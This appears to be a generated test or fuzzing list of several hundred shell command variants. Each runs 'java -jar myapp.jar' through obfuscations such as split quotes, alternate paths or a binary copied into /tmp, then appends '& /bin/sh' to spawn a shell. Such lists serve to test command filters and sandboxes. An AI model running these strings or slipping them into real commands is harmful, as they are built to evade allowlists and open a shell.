"java"  -jar myapp.jar & /bin/sh
"java" -jar myapp.jar & /bin/sh
"java"-jar myapp.jar & /bin/sh
'java'  -jar myapp.jar & /bin/sh
'java' -jar myapp.jar & /bin/sh
'java'-jar myapp.jar & /bin/sh
/bin/"java"  -jar myapp.jar & /bin/sh
/bin/"java" -jar myapp.jar & /bin/sh
/bin/"java"-jar myapp.jar & /bin/sh
/bin/'java'  -jar myapp.jar & /bin/sh
/bin/'java' -jar myapp.jar & /bin/sh
/bin/'java'-jar myapp.jar & /bin/sh
/bin/j""ava  -jar myapp.jar & /bin/sh
/bin/j""ava -jar myapp.jar & /bin/sh
/bin/j""ava-jar myapp.jar & /bin/sh
/bin/j''ava  -jar myapp.jar & /bin/sh
/bin/j''ava -jar myapp.jar & /bin/sh
/bin/j''ava-jar myapp.jar & /bin/sh
/bin/java  -jar myapp.jar & /bin/sh
/bin/java -jar myapp.jar & /bin/sh
/bin/java-jar myapp.jar & /bin/sh
/usr/bin/"java"  -jar myapp.jar & /bin/sh
/usr/bin/"java" -jar myapp.jar & /bin/sh
/usr/bin/"java"-jar myapp.jar & /bin/sh
/usr/bin/'java'  -jar myapp.jar & /bin/sh
/usr/bin/'java' -jar myapp.jar & /bin/sh
/usr/bin/'java'-jar myapp.jar & /bin/sh
/usr/bin/j""ava  -jar myapp.jar & /bin/sh
/usr/bin/j""ava -jar myapp.jar & /bin/sh
/usr/bin/j""ava-jar myapp.jar & /bin/sh
/usr/bin/j''ava  -jar myapp.jar & /bin/sh
/usr/bin/j''ava -jar myapp.jar & /bin/sh
/usr/bin/j''ava-jar myapp.jar & /bin/sh
/usr/bin/java  -jar myapp.jar & /bin/sh
/usr/bin/java -jar myapp.jar & /bin/sh
/usr/bin/java-jar myapp.jar & /bin/sh
command "java"  -jar myapp.jar & /bin/sh
command "java" -jar myapp.jar & /bin/sh
command "java"-jar myapp.jar & /bin/sh
command 'java'  -jar myapp.jar & /bin/sh
command 'java' -jar myapp.jar & /bin/sh
command 'java'-jar myapp.jar & /bin/sh
command j""ava  -jar myapp.jar & /bin/sh
command j""ava -jar myapp.jar & /bin/sh
command j""ava-jar myapp.jar & /bin/sh
command j''ava  -jar myapp.jar & /bin/sh
command j''ava -jar myapp.jar & /bin/sh
command j''ava-jar myapp.jar & /bin/sh
command java  -jar myapp.jar & /bin/sh
command java -jar myapp.jar & /bin/sh
command java-jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_0 && /tmp/tmp_bin_0 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_1 && /tmp/tmp_bin_1 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_10 && /tmp/tmp_bin_10 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_100 && /tmp/tmp_bin_100 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_101 && /tmp/tmp_bin_101 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_102 && /tmp/tmp_bin_102 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_103 && /tmp/tmp_bin_103 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_104 && /tmp/tmp_bin_104 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_105 && /tmp/tmp_bin_105 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_106 && /tmp/tmp_bin_106 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_107 && /tmp/tmp_bin_107 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_108 && /tmp/tmp_bin_108 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_109 && /tmp/tmp_bin_109 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_11 && /tmp/tmp_bin_11 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_110 && /tmp/tmp_bin_110 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_111 && /tmp/tmp_bin_111 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_112 && /tmp/tmp_bin_112 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_113 && /tmp/tmp_bin_113 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_114 && /tmp/tmp_bin_114 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_115 && /tmp/tmp_bin_115 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_116 && /tmp/tmp_bin_116 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_117 && /tmp/tmp_bin_117 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_118 && /tmp/tmp_bin_118 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_119 && /tmp/tmp_bin_119 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_12 && /tmp/tmp_bin_12 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_120 && /tmp/tmp_bin_120 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_121 && /tmp/tmp_bin_121 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_122 && /tmp/tmp_bin_122 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_123 && /tmp/tmp_bin_123 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_124 && /tmp/tmp_bin_124 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_125 && /tmp/tmp_bin_125 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_126 && /tmp/tmp_bin_126 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_127 && /tmp/tmp_bin_127 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_128 && /tmp/tmp_bin_128 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_129 && /tmp/tmp_bin_129 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_13 && /tmp/tmp_bin_13 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_130 && /tmp/tmp_bin_130 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_131 && /tmp/tmp_bin_131 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_132 && /tmp/tmp_bin_132 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_133 && /tmp/tmp_bin_133 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_134 && /tmp/tmp_bin_134 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_135 && /tmp/tmp_bin_135 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_136 && /tmp/tmp_bin_136 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_137 && /tmp/tmp_bin_137 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_138 && /tmp/tmp_bin_138 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_139 && /tmp/tmp_bin_139 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_14 && /tmp/tmp_bin_14 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_140 && /tmp/tmp_bin_140 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_141 && /tmp/tmp_bin_141 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_142 && /tmp/tmp_bin_142 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_143 && /tmp/tmp_bin_143 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_144 && /tmp/tmp_bin_144 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_145 && /tmp/tmp_bin_145 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_146 && /tmp/tmp_bin_146 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_147 && /tmp/tmp_bin_147 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_148 && /tmp/tmp_bin_148 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_149 && /tmp/tmp_bin_149 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_15 && /tmp/tmp_bin_15 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_150 && /tmp/tmp_bin_150 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_151 && /tmp/tmp_bin_151 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_152 && /tmp/tmp_bin_152 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_153 && /tmp/tmp_bin_153 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_154 && /tmp/tmp_bin_154 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_155 && /tmp/tmp_bin_155 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_156 && /tmp/tmp_bin_156 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_157 && /tmp/tmp_bin_157 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_158 && /tmp/tmp_bin_158 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_159 && /tmp/tmp_bin_159 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_16 && /tmp/tmp_bin_16 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_160 && /tmp/tmp_bin_160 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_161 && /tmp/tmp_bin_161 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_162 && /tmp/tmp_bin_162 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_163 && /tmp/tmp_bin_163 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_164 && /tmp/tmp_bin_164 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_165 && /tmp/tmp_bin_165 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_166 && /tmp/tmp_bin_166 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_167 && /tmp/tmp_bin_167 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_168 && /tmp/tmp_bin_168 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_169 && /tmp/tmp_bin_169 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_17 && /tmp/tmp_bin_17 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_170 && /tmp/tmp_bin_170 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_171 && /tmp/tmp_bin_171 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_172 && /tmp/tmp_bin_172 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_173 && /tmp/tmp_bin_173 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_174 && /tmp/tmp_bin_174 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_175 && /tmp/tmp_bin_175 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_176 && /tmp/tmp_bin_176 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_177 && /tmp/tmp_bin_177 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_178 && /tmp/tmp_bin_178 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_179 && /tmp/tmp_bin_179 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_18 && /tmp/tmp_bin_18 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_180 && /tmp/tmp_bin_180 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_181 && /tmp/tmp_bin_181 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_182 && /tmp/tmp_bin_182 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_183 && /tmp/tmp_bin_183 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_184 && /tmp/tmp_bin_184 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_185 && /tmp/tmp_bin_185 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_186 && /tmp/tmp_bin_186 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_187 && /tmp/tmp_bin_187 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_188 && /tmp/tmp_bin_188 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_189 && /tmp/tmp_bin_189 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_19 && /tmp/tmp_bin_19 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_190 && /tmp/tmp_bin_190 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_191 && /tmp/tmp_bin_191 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_192 && /tmp/tmp_bin_192 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_193 && /tmp/tmp_bin_193 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_194 && /tmp/tmp_bin_194 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_195 && /tmp/tmp_bin_195 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_196 && /tmp/tmp_bin_196 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_197 && /tmp/tmp_bin_197 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_198 && /tmp/tmp_bin_198 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_199 && /tmp/tmp_bin_199 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_2 && /tmp/tmp_bin_2 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_20 && /tmp/tmp_bin_20 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_200 && /tmp/tmp_bin_200 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_201 && /tmp/tmp_bin_201 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_202 && /tmp/tmp_bin_202 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_203 && /tmp/tmp_bin_203 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_204 && /tmp/tmp_bin_204 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_205 && /tmp/tmp_bin_205 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_206 && /tmp/tmp_bin_206 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_207 && /tmp/tmp_bin_207 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_208 && /tmp/tmp_bin_208 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_209 && /tmp/tmp_bin_209 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_21 && /tmp/tmp_bin_21 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_210 && /tmp/tmp_bin_210 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_211 && /tmp/tmp_bin_211 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_212 && /tmp/tmp_bin_212 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_213 && /tmp/tmp_bin_213 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_214 && /tmp/tmp_bin_214 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_215 && /tmp/tmp_bin_215 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_216 && /tmp/tmp_bin_216 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_217 && /tmp/tmp_bin_217 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_218 && /tmp/tmp_bin_218 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_219 && /tmp/tmp_bin_219 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_22 && /tmp/tmp_bin_22 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_220 && /tmp/tmp_bin_220 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_221 && /tmp/tmp_bin_221 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_222 && /tmp/tmp_bin_222 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_223 && /tmp/tmp_bin_223 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_224 && /tmp/tmp_bin_224 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_225 && /tmp/tmp_bin_225 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_226 && /tmp/tmp_bin_226 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_227 && /tmp/tmp_bin_227 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_228 && /tmp/tmp_bin_228 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_229 && /tmp/tmp_bin_229 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_23 && /tmp/tmp_bin_23 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_230 && /tmp/tmp_bin_230 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_231 && /tmp/tmp_bin_231 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_232 && /tmp/tmp_bin_232 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_233 && /tmp/tmp_bin_233 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_234 && /tmp/tmp_bin_234 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_235 && /tmp/tmp_bin_235 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_236 && /tmp/tmp_bin_236 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_237 && /tmp/tmp_bin_237 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_238 && /tmp/tmp_bin_238 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_239 && /tmp/tmp_bin_239 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_24 && /tmp/tmp_bin_24 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_240 && /tmp/tmp_bin_240 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_241 && /tmp/tmp_bin_241 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_242 && /tmp/tmp_bin_242 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_243 && /tmp/tmp_bin_243 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_244 && /tmp/tmp_bin_244 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_245 && /tmp/tmp_bin_245 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_246 && /tmp/tmp_bin_246 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_247 && /tmp/tmp_bin_247 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_248 && /tmp/tmp_bin_248 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_249 && /tmp/tmp_bin_249 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_25 && /tmp/tmp_bin_25 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_250 && /tmp/tmp_bin_250 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_251 && /tmp/tmp_bin_251 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_252 && /tmp/tmp_bin_252 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_253 && /tmp/tmp_bin_253 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_254 && /tmp/tmp_bin_254 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_26 && /tmp/tmp_bin_26 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_27 && /tmp/tmp_bin_27 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_28 && /tmp/tmp_bin_28 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_29 && /tmp/tmp_bin_29 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_3 && /tmp/tmp_bin_3 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_30 && /tmp/tmp_bin_30 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_31 && /tmp/tmp_bin_31 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_32 && /tmp/tmp_bin_32 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_33 && /tmp/tmp_bin_33 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_34 && /tmp/tmp_bin_34 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_35 && /tmp/tmp_bin_35 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_36 && /tmp/tmp_bin_36 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_37 && /tmp/tmp_bin_37 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_38 && /tmp/tmp_bin_38 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_39 && /tmp/tmp_bin_39 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_4 && /tmp/tmp_bin_4 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_40 && /tmp/tmp_bin_40 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_41 && /tmp/tmp_bin_41 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_42 && /tmp/tmp_bin_42 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_43 && /tmp/tmp_bin_43 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_44 && /tmp/tmp_bin_44 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_45 && /tmp/tmp_bin_45 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_46 && /tmp/tmp_bin_46 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_47 && /tmp/tmp_bin_47 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_48 && /tmp/tmp_bin_48 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_49 && /tmp/tmp_bin_49 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_5 && /tmp/tmp_bin_5 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_50 && /tmp/tmp_bin_50 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_51 && /tmp/tmp_bin_51 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_52 && /tmp/tmp_bin_52 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_53 && /tmp/tmp_bin_53 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_54 && /tmp/tmp_bin_54 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_55 && /tmp/tmp_bin_55 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_56 && /tmp/tmp_bin_56 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_57 && /tmp/tmp_bin_57 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_58 && /tmp/tmp_bin_58 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_59 && /tmp/tmp_bin_59 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_6 && /tmp/tmp_bin_6 -jar myapp.jar & /bin/sh
